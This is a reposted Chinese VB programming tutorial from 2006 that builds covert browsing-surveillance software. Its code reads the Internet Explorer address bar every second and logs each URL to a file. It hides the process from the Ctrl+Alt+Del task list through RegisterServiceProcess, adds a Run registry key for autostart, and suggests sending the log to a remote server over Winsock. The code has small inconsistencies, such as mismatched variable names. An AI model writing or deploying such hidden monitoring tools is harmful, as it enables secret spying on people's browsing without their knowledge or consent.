王朝网络
分享
 
 
 

一个用VB编写的监控别人上网的软件例子

王朝vb·作者佚名  2006-01-08
宽屏版  字体: |||超大  

一、程序核心

本程序的核心是通过API函数获得窗口句柄并获得浏览器访问的网址,在此基础上可以实现用Winsock控件进行远程的监视和管理。

1.先创建一个工程并在窗口Form1中,并声明下面的四个API函数和两个常量:

Option Explicit Private Declare Function FindWindow Lib ″user32″ Alias ″FindWindowA″ (ByVal lpCl assName As String, ByVal lpWindowName As String) As Long

′Findwindow函数的功能是找到当前运行的IE窗口的url地址的句柄

Private Declare Function SendMessage Lib ″user32″ Alias ″SendMessageA″ (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Long) As Long

′SendMessage函数的功能是向操作系统发送一条消息

Private Declare Function FindWindowEx Lib ″user32″ Alias ″FindWindowExA″ (ByVal hWnd1 As Long,ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

′FindwindowEx函数的功能是找到子窗体的句柄

Private Declare Function SendMessageByString Lib ″user32″ Alias ″SendMessageA″ (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long

Private Const WM_GETTEXT = &HD

Private Const WM_GETTEXTLENGTH = &HE

2.在窗体上添加Command控件,并命名为GetURLstring,单击此命令按钮,并为其添加下面的程序代码:

Private Sub GetURLstring_Click()

On Error GoTo CallErrorA

Dim sClassName As String ′设定一个字符串变量,是类变量

Dim lhwnd As Long ′设定一个长整形变量用来接收函数返回值

Dim WindowHandle As Long ′设定一个长整形变量用来接收函数的返回句柄

lhwnd = 0

sClassName = (″IEFrame″)

lhwnd = FindWindowEx(lhwnd, 0, sClassName, vbNullString) ′获得URL地址栏的句柄,获得IE窗口的句柄

sClassName = (″WorkerA″)

lhwnd = FindWindowEx(lhwnd, 0, sClassName, vbNullString) ′获得IE窗口的工作区的句柄

sClassName = (″ReBarWindow32″)

lhwnd = FindWindowEx(lhwnd, 0, sClassName, vbNullString) ′获得IE窗口的菜单栏的句柄

sClassName = (″ComboBoxEx32″)

lhwnd = FindWindowEx(lhwnd, 0, sClassName, vbNullString) ′获得IE窗口的下拉菜单的句柄

sClassName = (″ComboBox″)

lhwnd = FindWindowEx(lhwnd, 0, sClassName, vbNullString) ′获得IE窗口的下拉菜单当前项的句柄

sClassName = (″Edit″)

lhwnd = FindWindowEx(lhwnd, 0, sClassName, vbNullString) ′获得这个下拉菜单的编辑框句柄

WindowHandle = lhwnd ′接收当前我们想要的句柄

Dim buffer As String ′设定字符串变量接收当前的字符串

Dim TextLength As Long ′设定长整形变量接收字符串的长度

TextLength = SendMessage(WindowHandle, WM_GETTEXTLENGTH, 0&, 0&) ′向系统发送获得IE窗口的地址栏中的字符串长度命令

buffer = String(TextLength, 0) ′

Call SendMessageByString(WindowHandle, WM_GETTEXT, TextLength + 1, buffer) ′向系统发送获得IE窗体地址栏中的字符串命令

If buffer = ″″ Then

MsgBox ″MicroSoft InternetExplorer浏览器没有运行.″, vbOKOnly

Else

MsgBox buffer ′IE运行时显示当前网址

End If

Exit Sub

CallErrorA:

MsgBox Err.Description

Err.Clear

End Sub

二、添加定时保存功能

我们对上面的程序稍作改动,即可实现定时把当前访问的网址保存到文件,这样就为我们进行网络监控提供了保证。

1.在窗体上添加Timer控件Timer1,并将其属性Interval设置为1000,双击此控件,定义代码如下:

Private Sub Timer1_Timer()

GetURLstring_Click

End Sub

2. 在窗体代码开始的声明部分定义变量curUrl

Dim curUrl As String

3.用文件操作函数把Buffer变量中的字符串写进磁盘文件中,添加代码如下

Private Sub Form_Load()

Open App.Path & ″TestFile.txt″ For Output Access Write As #1 ′打开一个文件End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)

Close #1 ′关闭开始打开的文件

End Sub

并把GetURLstring_Click()中的如下部分

If buffer = ″″ Then

MsgBox ″MicroSoft InternetExplorer浏览器没有运行.″, vbOKOnly

Else

MsgBox buffer ′IE运行时显示当前网址

End If

改为如下代码:

If buffer <> ″″ And buffer <> curUrl Then

Write #1, Now & vbTab & buffer

curUrl = buffer

End If

三、隐蔽运行

为了防止运行在客户端的程序被用户发现,可以把窗体隐藏,并调用API函数让其在Ctrl+Alt+Del的程序列表中消失,需要把自己的程序注册为服务器(Service),这可以利用RegisterService API函数将程序的进程ID进行注册来实现。在程序退出时再次使用此API函数将服务器注册取消。方法如下:

1.在窗体的声明部分声明加入API函数和需要的常数:

Private Declare Function GetCurrentProcessId Lib ″kernel32″ () As Long

Private Declare Function GetCurrentProcess Lib ″kernel32″ () As Long

Private Declare Function RegisterServiceProcess Lib ″kernel32″ (ByVal dwProcessID As Long, _ ByVal dwType As Long) As Long

Private Const RSP_SIMPLE_SERVICE = 1

Private Const RSP_UNREGISTER_SERVICE = 0

2.注册为service和释放注册的过程:

在Form_Load事件的开始添加如下代码

Dim pid As Long

Dim reserv As Long

pid = GetCurrentProcessId() ′得到当前进程ID

regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE) ′把本程序注册为service

把Form_QueryUnload事件修改为如下代码,即在程序结束时把服务器注册取消

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)

Dim pid As Long

Dim reserv As Long

Close #1

pid = GetCurrentProcessId()

regserv = RegisterServiceProcess(pid, RSP_UNREGISTER_SERVICE)

End Sub

如果让程序开机运行,需要先把文件编译为可执行文件放到特定目录下,并修改注册表让其开机便运行,路径是HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersonRun,用API函数在里面写入个字符串型的键值,并把内容修改成为你的文件名(包括路径)即可,当然,更为实用的功能是把访问的网址信息定时传送到服务器,需要用到Winsock控件和定时传输。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
>>返回首页<<
推荐阅读
 
 
频道精选
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
© 2005- 王朝网络 版权所有